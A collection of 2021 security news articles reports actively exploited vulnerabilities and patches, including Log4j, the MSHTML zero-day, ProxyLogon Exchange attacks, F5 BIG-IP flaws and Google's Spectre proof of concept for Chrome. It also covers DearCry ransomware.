Exploit 2024  2023  2022  2021  2020

Hackers Begin Exploiting Second Log4j Vulnerability as a Third Flaw Emerges
20.12.2021  Exploit Thehackernews
Web infrastructure company Cloudflare on Wednesday revealed that threat actors are actively attempting to exploit a second bug disclosed in the widely used Log4j logging utility, making it imperative that customers move quickly to install the latest version as a barrage of attacks continues to pummel unpatched systems with a variety of malware.

The new vulnerability, assigned the identifier CVE-2021-45046, makes it possible for adversaries to carry out denial-of-service (DoS) attacks and follows disclosure from the Apache Software Foundation (ASF) that the original fix for the remote code execution bug — CVE-2021-44228 aka Log4Shell — was "incomplete in certain non-default configurations." The issue has since been addressed in Log4j version 2.16.0.

"This vulnerability is actively being exploited and anyone using Log4j should update to version 2.16.0 as soon as possible, even if you have previously updated to 2.15.0," Cloudflare's Andre Bluehs and Gabriel Gabor said.

Even more troublingly, researchers at security firm Praetorian warned of a third separate security weakness in Log4j version 2.15.0 that can "allow for exfiltration of sensitive data in certain circumstances." Additional technical details of the flaw have been withheld to prevent further exploitation, but it's not immediately clear if this has been already addressed in version 2.16.0.

"2.16 disables JNDI lookups by default and — as a result — is the safest version of Log4j2 that we're aware of," Anthony Weems, principal security engineer at Praetorian, told The Hacker News. When reached for a response, the Apache Logging Services Project Management Committee (PMC) confirmed that "We have been in contact with the engineer from Praetorian to fully understand the nature and scope of the problem."

The latest development comes as advanced persistent threat groups from China, Iran, North Korea, and Turkey, counting the likes of Hafnium and Phosphorus, have jumped into the fray to operationalize the vulnerability and discover and continue exploiting as many susceptible systems as possible for follow-on attacks. Over 1.8 million attempts to exploit the Log4j vulnerability have been recorded so far.

Microsoft Threat Intelligence Center (MSTIC) said it also observed access brokers leveraging the Log4Shell flaw to gain initial access to target networks that were then sold to other ransomware affiliates. In addition, dozens of malware families that run the gamut from cryptocurrency coin miners and remote access trojans to botnets and web shells have been identified taking advantage of this shortcoming to date.

While it's common for threat actors to make efforts to exploit newly disclosed vulnerabilities before they're remediated, the Log4j flaw underscores the risks arising from software supply chains when a key piece of software is used within a broad range of products across several vendors and deployed by their customers around the world.

"This cross-cutting vulnerability, which is vendor-agnostic and affects both proprietary and open-source software, will leave a wide swathe of industries exposed to remote exploitation, including electric power, water, food and beverage, manufacturing, transportation, and more," industrial cybersecurity firm Dragos noted.

"As network defenders close off more simplistic exploit paths and advanced adversaries incorporate the vulnerability in their attacks, more sophisticated variations of Log4j exploits will emerge with a higher likelihood of directly impacting Operational Technology networks," the company added.

Windows MSHTML 0-Day Exploited to Deploy Cobalt Strike Beacon in Targeted Attacks
19.9.21  Exploit  Thehackernews

Microsoft on Wednesday disclosed details of a targeted phishing campaign that leveraged a now-patched zero-day flaw in its MSHTML platform using specially-crafted Office documents to deploy Cobalt Strike Beacon on compromised Windows systems.

"These attacks used the vulnerability, tracked as CVE-2021-40444, as part of an initial access campaign that distributed custom Cobalt Strike Beacon loaders," Microsoft Threat Intelligence Center said in a technical write-up. "These loaders communicated with an infrastructure that Microsoft associates with multiple cybercriminal campaigns, including human-operated ransomware."

Details about CVE-2021-40444 (CVSS score: 8.8) first emerged on September 7 after researchers from EXPMON alerted the Windows maker about a "highly sophisticated zero-day attack" aimed at Microsoft Office users by taking advantage of a remote code execution vulnerability in MSHTML (aka Trident), a proprietary browser engine for the now-discontinued Internet Explorer and which is used in Office to render web content inside Word, Excel, and PowerPoint documents.

"The observed attack vector relies on a malicious ActiveX control that could be loaded by the browser rendering engine using a malicious Office document," the researchers noted. Microsoft has since rolled out a fix for the vulnerability as part of its Patch Tuesday updates a week later on September 14.

The Redmond-based tech giant attributed the activities to related cybercriminal clusters it tracks as DEV-0413 and DEV-0365, the latter of which is the company's moniker for the emerging threat group associated with creating and managing the Cobalt Strike infrastructure used in the attacks. The earliest exploitation attempt by DEV-0413 dates back to August 18.

The exploit delivery mechanism originates from emails impersonating contracts and legal agreements hosted on file-sharing sites. Opening the malware-laced document leads to the download of a Cabinet archive file containing a DLL bearing an INF file extension that, when decompressed, leads to the execution of a function within that DLL. The DLL, in turn, retrieves remotely hosted shellcode — a custom Cobalt Strike Beacon loader — and loads it into the Microsoft address import tool.

Additionally, Microsoft said some of the infrastructures that was used by DEV-0413 to host the malicious artifacts were also involved in the delivery of BazaLoader and Trickbot payloads, a separate set of activities the company monitors under the codename DEV-0193 (and by Mandiant as UNC1878).

"At least one organization that was successfully compromised by DEV-0413 in their August campaign was previously compromised by a wave of similarly-themed malware that interacted with DEV-0365 infrastructure almost two months before the CVE-2021-40444 attack," the researchers said. "It is currently not known whether the retargeting of this organization was intentional, but it reinforces the connection between DEV-0413 and DEV-0365 beyond sharing of infrastructure."

In an independent investigation, Microsoft's RiskIQ subsidiary attributed the attacks with high confidence to a ransomware syndicate known as Wizard Spider aka Ryuk, noting that the network infrastructure employed to provide command-and-control to the Cobalt Strike Beacon implants spanned more than 200 active servers.

"The association of a zero-day exploit with a ransomware group, however remote, is troubling," RiskIQ researchers said. It suggests either that turnkey tools like zero-day exploits have found their way into the already robust ransomware-as-a-service (RaaS) ecosystem or that the more operationally sophisticated groups engaged in traditional, government-backed espionage are using criminally controlled infrastructure to misdirect and impede attribution."

CISA Warns of Actively Exploited Zoho ManageEngine ADSelfService Vulnerability
10.9.21  Exploit  Thehackernews
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday issued a bulletin warning of a zero-day flaw affecting Zoho ManageEngine ADSelfService Plus deployments that is currently being actively exploited in the wild.

The flaw, tracked as CVE-2021-40539, concerns a REST API authentication bypass that could lead to arbitrary remote code execution (RCE). ADSelfService Plus builds up to 6113 are impacted.

ManageEngine ADSelfService Plus is an integrated self-service password management and a single sign-on solution for Active Directory and cloud apps, enabling admins to enforce two-factor authentication for application logins and users to reset their passwords.

"CVE-2021-40539 has been detected in exploits in the wild. A remote attacker could exploit this vulnerability to take control of an affected system," CISA said, urging companies to apply the latest security update to their ManageEngine servers and "ensure ADSelfService Plus is not directly accessible from the internet."

In an independent advisory, Zoho cautioned that it's a "critical issue" and that it's "noticing indications of this vulnerability being exploited."

"This vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request," the company said. "This would allow the attacker to carry out subsequent attacks resulting in RCE."

CVE-2021-40539 is the fifth security weakness disclosed in ManageEngine ADSelfService Plus since the start of the year, three of which — CVE-2021-37421 (CVSS score: 9.8), CVE-2021-37417 (CVSS score: 9.8), and CVE-2021-33055 (CVSS score: 9.8) — were addressed in recent updates. A fourth vulnerability, CVE-2021-28958 (CVSS score: 9.8), was rectified in March 2021.

This development also marks the second time a flaw in Zoho enterprise products has been actively exploited in real-world attacks. In March 2020, APT41 actors were found leveraging an RCE flaw in ManageEngine Desktop Central (CVE-2020-10189, CVSS score: 9.8) to download and execute malicious payloads in corporate networks as part of a global intrusion campaign.

TikTok Pays Out $11,000 Bounty for High-Impact Exploit

23.3.2021 Exploit  Securityweek

A researcher has earned over $11,000 from TikTok after disclosing a series of vulnerabilities that could have been chained for a high-impact 1-click exploit.

In a blog post published on Medium last week, Sayed Abdelhafiz, an 18-year-old researcher from Egypt, disclosed the details of several vulnerabilities he identified late last year and in early 2021 in the TikTok app for Android.

Abdelhafiz discovered a couple of cross-site scripting (XSS) vulnerabilities, an issue related to starting arbitrary components, and a so-called Zip Slip archive extraction vulnerability. Chaining these vulnerabilities could have allowed an attacker to remotely execute arbitrary code on the targeted user’s Android device simply by convincing them to click on a malicious link.

Abdelhafiz told SecurityWeek that it was enough for the victim to click on a link posted on a website or sent to their TikTok inbox.

As for what an attacker could have done with this exploit, the researcher said “anything TikTok can do on your device, the exploit can do.”

“If the victim has given the storage permission to the TikTok application, the exploit can access the storage's files,” Abdelhafiz explained. “If bad people exploit this vulnerability, they may chain it with an Android vulnerability to take over the whole device, even if the TikTok app doesn't have permission to do anything.”

Abdelhafiz told SecurityWeek that TikTok acted quickly and rolled out a temporary fix within a week, but the social media giant only allowed him to disclose details of his findings last week.

The researcher’s blog post contains proof-of-concept (PoC) code, as well as information on how TikTok addressed the vulnerabilities.

TikTok launched its public bug bounty program in collaboration with HackerOne in October 2020. On its HackerOne page, the company says it has paid out nearly $130,000 to date, with top bounties ranging between $2,000 and $12,000.

Critical F5 BIG-IP Bug Under Active Attacks After PoC Exploit Posted Online
21.3.2021 Exploit  Thehackernews

Almost 10 days after application security company F5 Networks released patches for critical vulnerabilities in its BIG-IP and BIG-IQ products, adversaries have begun opportunistically mass scanning and targeting exposed and unpatched networking devices to break into enterprise networks.

News of in the wild exploitation comes on the heels of a proof-of-concept exploit code that surfaced online earlier this week by reverse-engineering the Java software patch in BIG-IP. The mass scans are said to have spiked since March 18.

The flaws affect BIG-IP versions 11.6 or 12.x and newer, with a critical remote code execution (CVE-2021-22986) also impacting BIG-IQ versions 6.x and 7.x. CVE-2021-22986 (CVSS score: 9.8) is notable for the fact that it's an unauthenticated, remote command execution vulnerability affecting the iControl REST interface, allowing an attacker to execute arbitrary system commands, create or delete files, and disable services without the need for any authentication.

Successful exploitation of these vulnerabilities could lead to a full compromise of susceptible systems, including the possibility of remote code execution as well as trigger a buffer overflow, leading to a denial of service (DoS) attack.

While F5 said it wasn't aware of any public exploitation of these issues on March 10, researchers from NCC Group said they have now found evidence of "full chain exploitation of F5 BIG-IP/BIG-IQ iControl REST API vulnerabilities CVE-2021-22986" in the wake of multiple exploitation attempts against its honeypot infrastructure.

Additionally, Palo Alto Networks' Unit 42 threat intelligence team said it found attempts to exploit CVE-2021-22986 to install a variant of the Mirai botnet. But it's not immediately clear if those attacks were successful.

Given the popularity of BIG-IP/BIG-IQ in corporate and government networks, it should come as no surprise that this is the second time in a year F5 appliances have become a lucrative target for exploitation.

Last July, the company addressed a similar critical flaw (CVE-2020-5902), following which it was abused by Iranian and Chinese state-sponsored hacking groups, prompting the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to issue an alert cautioning of a "broad scanning activity for the presence of this vulnerability across federal departments and agencies."

"The bottom line is that [the flaws] affect all BIG-IP and BIG-IQ customers and instances — we urge all customers to update their BIG-IP and BIG-IQ deployments to the fixed versions as soon as possible," F5 Senior Vice President Kara Sprague noted last week.

Google Releases Spectre PoC Exploit For Chrome

17.3.2021 Exploit  Threatpost

Google has released the side-channel exploit in hopes of motivating web-application developers to protect their sites.

Google has released proof-of-concept (PoC) exploit code, which leverages the Spectre attack against the Chrome browser to leak data from websites.

Three years after the Spectre attack was first disclosed, researchers with Google have now released a demonstration website that leverages the attack, written in JavaScript, to leak data at a speed of 1 kilobyte per second (kbps) when running on Chrome 88 on an Intel Skylake CPU.

The researchers said they hope the PoC will light a fire under web application developers to take active steps to protect their sites.

“Today, we’re sharing proof-of-concept (PoC) code that confirms the practicality of Spectre exploits against JavaScript engines,” said Stephen Röttger and Artur Janc, information security engineers with Google, on Friday. “We use Google Chrome to demonstrate our attack, but these issues are not specific to Chrome, and we expect that other modern browsers are similarly vulnerable to this exploitation vector.”

Spectre and Speculative-Execution Attacks
The Spectre (CVE-2017-5753 and CVE-2017-5715) and Meltdown (CVE-2017-5754) flaws rocked the silicon industry when the vulnerabilities were made public in early 2018. These vulnerabilities derive from a process called speculative execution in processors. It’s is used in microprocessors so that memory can read before the addresses of all prior memory writes are known; an attacker with local user access can use a side-channel analysis to gain unauthorized disclosure of information.

What originally set Spectre apart was its sheer breadth in terms of affected devices – the attack impacted many modern processors, including those made by Intel and AMD; as well as major operating systems like Android, ChromeOS, Linux, macOS and Windows. One variant, Variant 1, (CVE-2017-5753) also related to JavaScript exploitation against browsers.

At the same time, after the public disclosure of Spectre, hardware and software manufacturers, as well as browser-makers, released various mitigations against the attacks.

The Spectre PoC Exploit
At a high level, the PoC is comprised of a Spectre “gadget,” or code, that triggers attacker-controlled transient execution, and a side channel that serves as a method for attackers to observe the side effects of this transient execution (and thus view various sensitive data — which could include passwords stored in a browser, personal photos, emails, instant messages and even business-critical documents). A video demo of the PoC can be viewed below.

The PoC builds on 2018 research from the team behind the V8 browser engine. The research shows that one potential mitigation of Spectre, reduced timer granularity, does not sufficiently mitigate against the attack. That’s because attackers can amplify timing differences in order to increase the odds of capturing sensitive data, according to the research.

However, the technique stemmed from reading sensitive data multiple times — which Google researchers argued can reduce the effectiveness of the attack if the information leak is subject to chance variation.

Researchers with Google said they overcame this limitation with their new PoC. This new method relies on Tree-PLRU, which is a cache algorithm used to clear data in various CPUs: “By abusing the behavior of the Tree-PLRU cache eviction strategy commonly found in modern CPUs, we were able to significantly amplify the cache timing with a single read of secret data,” said researchers. “This allowed us to leak data efficiently even with low precision timers.”

Researchers said they don’t believe the PoC can be re-used for nefarious purposes “without significant modifications” – however, they hope that the release of the PoC “provides a clear signal for web-application developers that they need to consider this risk in their security evaluations and take active steps to protect their sites.”

This is especially needed as Spectre exploits continue to pop up; working Windows and Linux Spectre exploits were uploaded to VirusTotal earlier this month, for instance.

Such protections could include implementing cross-origin resource policy (CORP) and fetch metadata request headers, allowing developers to control which sites can embed their resources and preventing data from being delivered to an attacker-controlled browser.

Is there a link between Microsoft Exchange exploits and PoC code the company shared with partner security firms?
17.3.2021 Exploit  Securityaffairs

Microsoft is reportedly investigating whether the recent attacks against Microsoft Exchange servers could be linked to information leaked by a partner security firm.
According to a report published by The Wall Street Journal, Microsoft is investigating whether the threat actors behind the recent wave of attacks on Microsoft Exchange servers worldwide may have obtained sensitive information to launch the attack from a partner security firm.

The information may have been obtained through “private disclosures it [Microsoft] made with some of its security partners.”

On March 2nd, Microsoft released emergency out-of-band security updates that address four zero-day issues (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) in all supported MS Exchange versions that are actively exploited in the wild.

The IT giant reported that at least one China linked APT group, tracked as HAFNIUM, chained these vulnerabilities to access on-premises Exchange servers to access email accounts, and install backdoors to maintain access to victim environments.

According to Microsoft, the Hafnium APT exploited these vulnerabilities in targeted attacks against US organizations. The group historically launched cyber espionage campaigns aimed at US-based organizations in multiple industries, including law firms and infectious disease researchers.

In past campaigns, HAFNIUM attackers also interacted with victim Office 365 tenants.
Microsoft is aware that the attacks began in early January, before the company was able to address it with the release of security updates. Some China-linked APT groups obtained the exploit code to target Microsoft Exchange email servers worldwide.

“Microsoft Corp. is investigating whether the hackers behind a world-wide cyberattack may have obtained sensitive information necessary to launch the attack from private disclosures it made with some of its security partners, according to people familiar with the matter.” reads the article published by The Wall Street Journal. “Investigators have focused on whether a Microsoft partner with whom it shared information about the bug hackers were exploiting leaked it to other groups, either inadvertently or on purpose, the people said.”

On March 2, Microsoft issued emergency patches to tackle four zero-day vulnerabilities in Microsoft Exchange Server which were being actively exploited in the wild.

The vulnerabilities were privately disclosed in January, but evidently, someone contained the information about the flaws and started exploiting them in the wild.

Microsoft suspects that the code used in the attacks was obtained from the PoC code it has privately sent to partners of the Microsoft Active Protections Program (Mapp), it is not clear whether it was deliberately or accidentally leaked.

PoC exploit code was sent to partner cybersecurity firms and antivirus on February 23, prior Redmond giant released the patches. Experts noticed that the exploit code used in the attacks in the wild was similar to the PoC shared by Microsoft.

“Some of the tools used in the second wave of the attack, which is believed to have begun on Feb. 28, bear similarities to “proof of concept” attack code that Microsoft distributed to antivirus companies and other security partners on Feb. 23, investigators at security companies say.” continues the WSJ.

Mapp includes about 80 security companies worldwide, 10 of which are based in China. Some of the Mapp partners received the PoC code on February 23, according to sources familiar with the program. At the time of this writing, Microsoft has yet to confirm whether any Chinese companies received the code.

It is not the first time that such kind of leak has happened, in May 2012, Microsoft cut off Hangzhou DPtech Technologies Co. Ltd., a MAPP partner company based in China, for leaking data related to CVE-2012-0002.

The investigation is still ongoing, but the public availability of multiple PoC exploits is causing a surge of cyber attacks exploiting ProxyLogon vulnerabilities on a global scale.

Over 80,000 Exchange Servers Still Affected by Actively Exploited Vulnerabilities
16.3.2021 Exploit  Securityweek

Roughly 80,000 Exchange servers have yet to receive patches for the actively exploited vulnerabilities, Microsoft says.

The bugs were publicly disclosed on March 2, when the Redmond-based tech giant announced not only patches for them, but also the fact that a Chinese threat actor had been actively exploiting them in attacks.

Within days, security researchers revealed that multiple adversaries were quick to pick up exploits for the Exchange bugs, but also that some had been targeting the flaws even before patches were released. The first known exploitation attempt is dated January 3, 58 days before public disclosure.

Over the course of last week, Microsoft released additional fixes for these vulnerabilities, including security updates (SUs) for older and unsupported Exchange Server versions, or Cumulative Updates (CU), as the company calls them.

“This is intended only as a temporary measure to help you protect vulnerable machines right now. You still need to update to the latest supported CU and then apply the applicable SUs,” Microsoft said.

With the latest set of released updates, more than 95% of the Exchange Server versions that are exposed to the Internet are covered, yet tens of thousands of machines remain vulnerable. Microsoft revealed that, as of March 12, more than 82,000 Exchange servers were still left to be updated (out of 400,000 identified on March 1).

Last week, ESET reported that more than 10 threat actors were observed targeting vulnerable Exchange servers. Ransomware operators also started targeting the flaws, and the overall number of attacks aimed at the Exchange zero-days grew exponentially over the course of several days only.

On Sunday, security researchers at Check Point pointed out that “the number exploitation attempts multiplied by more than 6 times” within “the past 72 hours alone,” adding that they had identified more than 4,800 exploits and hundreds of compromised organizations worldwide.

The United States was being targeted the most, accounting for 21% of all exploitation attempts, followed by the Netherlands and Turkey, both at 12%. According to Check Point, government/military was the sector being targeted the most (27% of attempts), followed by manufacturing (22%) and software (9%).

“As we enter the second week since the vulnerabilities became public, initial estimates place the number of compromised organizations in the tens of thousands,” Palo Alto Networks said last week.

In a timeline of the attacks, the security firm revealed that the first two bugs were identified on December 10 and 30, 2020, respectively, and reported to Microsoft on January 5, 2021. A third security hole was identified and reported while already under attack, on January 27.

“Ongoing research illustrates that these vulnerabilities are being used by multiple threat groups. While it is not new for highly skilled attackers to leverage new vulnerabilities across varying product ecosystems, the ways in which these attacks are conducted to bypass authentication — thereby providing unauthorized access to emails and enabling remote code execution (RCE) — is particularly nefarious,” Palo Alto Networks noted.

Microsoft published additional information on how organizations can protect their on-premises Exchange servers against exploitation, reiterating that applying the available patches represents the first step, followed by identifying possibly compromised systems and removing them from the network.

ProxyLogon Microsoft Exchange exploit is completely out of the bag by now
15.3.2021 Exploit  Securityaffairs

A security researcher released a new PoC exploit for ProxyLogon issues that could be adapted to install web shells on vulnerable Microsoft Exchange servers.
A security researcher has released a new proof-of-concept exploit that could be adapted to install web shells on Microsoft Exchange servers vulnerable ProxyLogon issues.

Since the disclosure of the flaw, security experts observed a surge in the attacks against Microsoft Exchange mailservers worldwide.

Check Point Research team reported that that in a time span of 24 hours the exploitation attempts are doubling every two hours.
“CPR has seen hundreds of exploit attempts against organizations worldwide” reads the post published by CheckPoint. “In the past 24 hours alone, CPR has observed that the number exploitation attempts on organizations it tracks doubled every two to three hours.”

Most of exploit attempts targeted organizations in Turkey (19%), followed by United States (18%) and Italy (10%). Most targeted sectors have been Government/Military (17% of all exploit attempts), followed by Manufacturing (14%), and then Banking (11%).
Security experts pointed out that the flaws are actively exploited to deliver web shells, and more recently ransomware such as the DearCry ransomware.
Last week, the independent security researcher Nguyen Jang published on GitHub a proof-of-concept tool to hack Microsoft Exchange servers. The tool chains two of the ProxyLogon vulnerabilities recently addressed by Microsoft.

The availability of the proof-of-concept code was first reported by The Record.

A few hours after the publication, GitHub took down the PoC hacking tool because it posed a threat to Microsoft’s customers using the Microsoft Exchange solution.
Jang explained that he has published the PoC code to raise the alert on the recent wave of hacks and give the opportunity to colleagues to study the code use in the attacks.
Experts at Praetorian published a detailed technical analysis of the exploit for the Microsoft Exchange flaws, they performed a reverse-engineering of the CVE-2021-26855 patch and developed a fully functioning end-to-end exploit

During the weekend, another security researcher published a new PoC exploit for the ProxyLogon vulnerabilities. The code is not ready-to-use but requires to be modified to be used to compromise vulnerable Microsoft Exchange servers.
Will Dorman, a vulnerability researcher at the CERT/CC, confirmed the availability of the exploit and that it works.

He pointed out that there is no need to search for exploit in the dark web or on cybercrime/hacking forums, searching it on Google it is possible to find the exploit code.

A joint analysis conducted by Microsoft and RiskIQ allowed to identify more than 100,000 servers still vulnerable.

“Based on telemetry from RiskIQ, we saw a total universe of nearly 400,000 Exchange servers on March 1. By March 9 there were a bit more than 100,000 servers still vulnerable. That number has been dropping steadily, with only about 82,000 left to be updated,” reads a post published by Microsoft last week. “We released one additional set of updates on March 11, and with this, we have released updates covering more than 95% of all versions exposed on the Internet.”

The public availability of PoC exploits and the large number of vulnerable Exchange servers exposed online pose serious risks for organizations.

Google fixes the third actively exploited Chrome 0-Day since January
15.3.2021 Exploit  Securityaffairs

Google has addressed a new zero-day flaw in its Chrome browser that has been actively exploited in the wild, the second one within a month
Google has fixed a new actively exploited zero-day in its Chrome browser, this is the second zero-day issue addressed by the IT giant within a month. The flaw, tracked as CVE-2021-21193, is a use after free vulnerability in the Blink rendering engine.

Google addressed the issue with the 89.0.4389.90 version for Windows, Mac, and Linux, which will be available in the coming days.

The flaw was reported to Google by an anonymous researcher on March 9, at the time of this writing the company did not reveal details about the vulnerability to avoid those other threat actors could exploit the issue in the wild.

Google also addressed other 4 vulnerabilities.
“This update includes 5 security fixes. Below, we highlight fixes that were contributed by external researchers. Please see the Chrome Security Page for more information.” reads the post published by Google.

[$500][1167357] High CVE-2021-21191: Use after free in WebRTC. Reported by raven (@raid_akame) on 2021-01-15
[$TBD][1181387] High CVE-2021-21192: Heap buffer overflow in tab groups. Reported by Abdulrahman Alqabandi, Microsoft Browser Vulnerability Research on 2021-02-23
[$TBD][1186287] High CVE-2021-21193: Use after free in Blink. Reported by Anonymous on 2021-03-09“
“Google is aware of reports that an exploit for CVE-2021-21193 exists in the wild.”

Chrome Technical Program Manager Prudhvikumar Bommana added that Google has detected some of the bugs using AddressSanitizer, MemorySanitizer, UndefinedBehaviorSanitizer, Control Flow Integrity, libFuzzer, or AFL.

CVE-2021-21193 is the third zero-day flaw in Chrome actively exploited that has been addressed since January.

In early February, Google has addressed an actively exploited zero-day vulnerability, tracked as CVE-2021-21148, with the release of the Chrome 88.0.4324.150 version. The vulnerability is a Heap buffer overflow that resides in the V8, which is an open-source high-performance JavaScript and WebAssembly engine, written in C++.
Earlier this month, Google addressed another zero-day issue, tracked as CVE-2021-21166, actively exploited in the wild.

In 2020, Google addresses five Chrome zero-days actively exploited in the wild.

In October, the IT giant addressed the following three zero-days:

CVE-2020-15999 – The flaw is a memory corruption bug that resides in the FreeType font rendering library, which is included in standard Chrome releases.
CVE-2020-16009 – is a Heap buffer overflow in Freetype in Google Chrome.
CVE-2020-16010 – affects the browser’s user interface (UI) component in Chrome for Android.
In November, the company addressed two other zero-day vulnerabilities, actively exploited in the wild.

Both zero-day flaws, tracked as CVE-2020-16013 and CVE-2020-16017, were reported by anonymous sources.

Google Releases PoC Exploit for Browser-Based Spectre Attack
15.3.2021 Exploit  Securityweek

Google last week announced the release of proof-of-concept (PoC) code designed to exploit the notorious Spectre vulnerability and leak information from web browsers.

Initially detailed in early 2018 alongside Meltdown, the side-channel attack could allow a malicious application to access data being processed on the device. The vulnerability could expose passwords, documents, emails, data from instant messaging apps, and more.

Since the public disclosure of Meltdown and Spectre, both hardware makers and software developers alike have been working on devising protections against similar flaws, and browser makers too have been implementing application-level mitigations.

In 2019, the Google team responsible for Chrome’s V8 JavaScript engine said that the attack can’t be mitigated at the software level, arguing that security boundaries in browsers should be aligned with low-level primitives, such as process-based isolation.

To keep their users safe, browser makers have already implemented protections such as Site Isolation, Cross-Origin Read Blocking, and out-of-process iframes, with a variety of security features available for other application developers as well, including Cross-Origin Resource and Cross-Origin Opener Policies, and more.

The purpose of these mechanisms is to prevent sensitive data from being present in memory sections that an attacker could read. However, they do not prevent Spectre exploitation.

In order to assess the effectiveness of such mitigations, Google’s researchers have released JavaScript PoC code functional across multiple operating systems, architectures, and hardware variants, and which “confirms the practicality of Spectre exploits against JavaScript engines.”

While Chrome has been used to demonstrate the attack, the exploited issues are not specific to Google’s browser, but affect other modern browsers as well. An interactive demonstration of the attack can be accessed on this page, while the code and technical details were published on Github.

“The demonstration website can leak data at a speed of 1kB/s when running on Chrome 88 on an Intel Skylake CPU. Note that the code will likely require minor modifications to apply to other CPUs or browser versions; however, in our tests the attack was successful on several other processors, including the Apple M1 ARM CPU, without any major changes,” Google explains.

In addition to releasing the PoC, Google is making recommendations (Post-Spectre Web Development and Mitigating Side-Channel Attacks) on how web developers can improve site isolation to deny access to cross-origin resources, thus effectively mitigating Spectre-style hardware attacks, among others.

Such mitigations include Cross-Origin Resource Policy (CORP) and Fetch Metadata Request Headers, Cross-Origin Opener Policy (COOP), and Cross-Origin Embedder Policy (COEP), along with standard protections, such as the X-Frame-Options and X-Content-Type-Options headers, along with SameSite cookies.

“It's important to note that while […] the mechanisms […] are important and powerful security primitives, they don't guarantee complete protection against Spectre; they require a considered deployment approach which takes behaviors specific to the given application into account,” Google notes.

Google releases Spectre PoC code exploit for Chrome browser
14.3.2021 Exploit  Securityaffairs

Google released proof-of-concept code to conduct Spectre attacks against its Chrome browser to share knowledge of browser-based side-channel attacks.
Google released proof-of-concept code for conducting a Spectre attack against its Chrome browser on GitHub. The experts decided to publish the proof of concept code to demonstrate the feasibility of a web-based Spectre exploit.

The PoC code was written in JavaScript and works on Chrome 88 on an Intel Skylake CPU, it allows extracting data from device memory at speed of 1kB/s.

“Today, we’re sharing proof-of-concept (PoC) code that confirms the practicality of Spectre exploits against JavaScript engines. We use Google Chrome to demonstrate our attack, but these issues are not specific to Chrome, and we expect that other modern browsers are similarly vulnerable to this exploitation vector.” reads the post published by Google. “We have developed an interactive demonstration of the attack available at https://leaky.page/; the code and a more detailed writeup are published on Github here.”

Google researchers speculate the PoC code works on other CPUs (different vendor and/or generation), operating systems and Chromium flavors.

Below the description of the demo published on a site set up by Google to host the PoC code.

“This demo is split into three parts:

Calibrating the timer to observe side effects of the CPU’s speculative execution.
A demonstration that infers the memory layout of a JavaScript array.
The Spectre proof of concept itself, leaking memory of your browser’s renderer process.”
In January 2018, the expert devised two attacks dubbed Meltdown (CVE-2017-5754) and Spectre (CVE-2017-5753 and CVE-2017-5715), which could be conducted to steal sensitive data processed by the CPU.

Both attacks leverage the “speculative execution” technique used by most modern CPUs to optimize performance.

To protect systems from bot Meltdown and Spectre attacks it is possible to implement the hardening technique known as kernel page table isolation (KPTI). The technique allows isolating kernel space from user space memory.

The PoC code released by Google allows to recover cached data from the memory, including sensitive data such as the encryption keys.

The released PoC code could be easily set up because it works without a high-precision timer like SharedArrayBuffer.

“For the published PoC, we implemented a simple Variant 1 gadget: a JavaScript array is speculatively accessed out of bounds after training the branch predictor that the compiler-inserted length check will succeed.” continues Google. “This particular gadget can be mitigated at the software level; however, Chrome’s V8 team concluded that this is not the case for other gadgets: “we found that effective mitigation of some variants of Spectre, particularly variant 4, to be simply infeasible in software.” We invite the security community to extend our research and develop code that makes use of other Spectre gadgets.”
Google experts also developed other PoC exploits s with different properties, but they did not release them. One of these PoC codes allows leaking data at a rate of 8kB/s, but it is less stable due to the use of the performance.now() API as a 5μs (5000ms) precision timer. Another PoC uses a timer of 1ms or worse and allows to leak data at a rate of only 60B/s.
Google recommends developers to use new security mechanisms to Spectre hardware attacks and common web-level cross-site leaks.

Standard protections include X-Content-Type-Options, X-Frame-Options headers, and the use of SameSite cookies. but researchers also recommend enabling the following protections:

Cross-Origin Resource Policy (CORP) and Fetch Metadata Request Headers allow developers to control which sites can embed their resources, such as images or scripts, preventing data from being delivered to an attacker-controlled browser renderer process. See resourcepolicy.fyi and web.dev/fetch-metadata.
Cross-Origin Opener Policy (COOP) lets developers ensure that their application window will not receive unexpected interactions from other websites, allowing the browser to isolate it in its own process. This adds an important process-level protection, particularly in browsers which don’t enable full Site Isolation; see web.dev/coop-coep.
Cross-Origin Embedder Policy (COEP) ensures that any authenticated resources requested by the application have explicitly opted in to being loaded. Today, to guarantee process-level isolation for highly sensitive applications in Chrome or Firefox, applications must enable both COEP and COOP; see web.dev/coop-coep.
The Google Security Team released a prototype Chrome extension named Spectroscope that allows web developers to protect their websites from Spectre.

Microsoft Exchange Exploits Pave a Ransomware Path

13.3.2021 Exploit  Threatpost

As attacks double every hour, hackers are exploiting vulnerable Microsoft Exchange servers and installing a new family of ransomware called DearCry.

Cybercriminals are now using compromised Microsoft Exchange servers as a foothold to deploy a new ransomware family called DearCry, Microsoft has warned.

The ransomware is the latest threat to beleaguer vulnerable Exchange servers, emerging shortly after Microsoft issued emergency patches in early March for four Microsoft Exchange flaws. The flaws can be chained together to create a pre-authentication remote code execution (RCE) exploit – meaning that attackers can take over servers without knowing any valid account credentials.

The flaws give attackers the opportunity to install a webshell for further exploitation within the environment — and now, researchers say attackers are downloading the new ransomware strain (a.k.a. Ransom:Win32/DoejoCrypt.A) as part of their post-exploitation activity on unpatched servers.

“We have detected and are now blocking a new family of ransomware being used after an initial compromise of unpatched on-premises Exchange Servers,” Microsoft said on Twitter, Thursday.

DearCry Ransomware
DearCry first came onto the infosec space’s radar after ransomware expert Michael Gillespie on Thursday said he observed a “sudden swarm” of submissions to his ransomware identification website, ID-Ransomware.

The ransomware uses the extension “.CRYPT” when encrypting files, as well as a filemarker “DEARCRY!” in the string for each encrypted file.

Microsoft later confirmed that the ransomware was being launched by attackers using the four Microsoft Exchange vulnerabilities, known collectively as ProxyLogon, which are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.

According to a report by BleepingComputer, the ransomware drops a ransom note (called ‘readme.txt’) after initially infecting the victim – which contains two email addresses for the threat actors and demands a ransom payment of $16,000.

Meanwhile, MalwareHunterTeam on Twitter said that victim companies of DearCry have been spotted in Australia, Austria, Canada, Denmark and the U.S. On Twitter, MalwareHunterTeam said the ransomware is “not that very widespread (yet?).” Thus far, three samples of the DearCry ransomware were uploaded to VirusTotal on March 9 (the hashes for which can be found here).

Microsoft Exchange Attacks Doubling Every Hour
